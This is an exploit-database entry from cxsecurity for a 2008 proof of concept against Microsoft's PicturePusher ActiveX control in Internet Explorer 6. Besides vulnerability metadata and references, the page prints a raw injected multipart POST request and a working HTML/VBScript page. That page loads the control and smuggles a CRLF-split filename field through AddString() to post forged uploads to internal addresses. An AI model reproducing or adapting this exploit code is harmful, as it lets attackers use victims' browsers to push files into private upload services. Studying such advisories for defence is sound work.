Microsoft PicturePusher ActiveX Cross Site File Upload Attack PoC

2008-10-09 / 2008-10-10
Credit: rgod
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-20


CVSS Base Score: 6.8/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

<!-- Microsoft PicturePusher ActiveX (PipPPush.DLL 7.00.0709) remote Cross Site File Upload attack POC (IE6) by Nine:Situations:Group::pyrokinesis bug discovered by rgod during early March 2008 tested software: Microsoft Digital Image 2006 Starter Edition works fine against IE6, with some warnings with IE7 dll settings: RegKey Safe for Script: False RegKey Safe for Init: False Implements IObjectSafety: True IDisp Safe: Safe for untrusted: caller,data This control allows to build highly customized POST requests against private upload facilities, using the browser as a proxy to bounce them and by injecting a filename sub-field through ex. the AddString() method The magic packet : POST /?aaaa=1 HTTP/1.1 Content-Type: multipart/form-data; boundary=--------------------------- User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows NT 5.0) [MSN Communities Active-X Upload Control] Host: 127.0.0.1 Content-Length: 181 Cache-Control: no-cache ----------------------------- Content-Disposition: form-data; name="aaaa"; filename="suntzu.test" Content-Type: text/plain; AAAA: "" xxxxxxxx ------------------------------- --> <HTML> <OBJECT classid='clsid:507813C3-0B26-47AD-A8C0-D483C7A21FA7' id='PicturePusherControl' /> </OBJECT> <script language='vbscript'> 'PicturePusherControl.PostURL = "http://127.0.0.1/?aaaa=1" PicturePusherControl.PostURL = "http://192.168.1.1/?aaaa=1" PicturePusherControl.AddSeperator CRLF = unescape("%0d%0a") FormElementName="aaaa""; filename=""suntzu.test"" " + CRLF + "Content-Type: text/plain; AAAA: """ Value="xxxxxxxx" 'for some reason cannot do this with AddFile() method, however... PicturePusherControl.AddString FormElementName ,Value PicturePusherControl.Post </script>

References:

http://xforce.iss.net/xforce/xfdb/45735
http://www.securityfocus.com/bid/31632
http://www.milw0rm.com/exploits/6699


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top